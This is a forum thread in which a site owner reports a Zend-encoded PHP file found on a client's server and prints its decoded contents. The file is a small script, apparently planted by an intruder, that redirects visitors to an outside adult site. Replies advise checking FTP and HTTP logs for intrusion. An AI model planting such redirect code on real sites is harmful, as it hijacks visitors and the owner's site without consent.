Hacked? Weird zend encoded file on my server

I found a weird file on a client's server while making website updates. The website is just a static html site except for a site contact us form with php (no file uploads or anything)..the contact us form writes to a text file.

Anyway, the weird file was Zend encoded... using showmycode.com i decoded it. the result was:

<?php
if ( getenv( "QUERY_STRING" ) == "delete" )
{
    header( "Location: http://lesbiansportal.imess.net/remove.html" );
}
else
{
    header( "Location: http://lesbiansportal.imess.net/" );
}
?>

PHP:

Thoughts? Nothing else is weird on the site and looking at Awstats, no one has ever gone to this page.

 

does it re-direct?...try clearing cache and see

 

Does it re-direct?...try clearing cache and see, may be seeing the old page.

 

the page redirects to the lesbianportal site. i don't know what would happen if I added ?delete to the url

 

Check FTP log for unauthorized FTP accesses. Check HTTP log for RFI attacks that might have injected code into pages.

 

Find the vulnerability first otherwise your going to be running around in circles.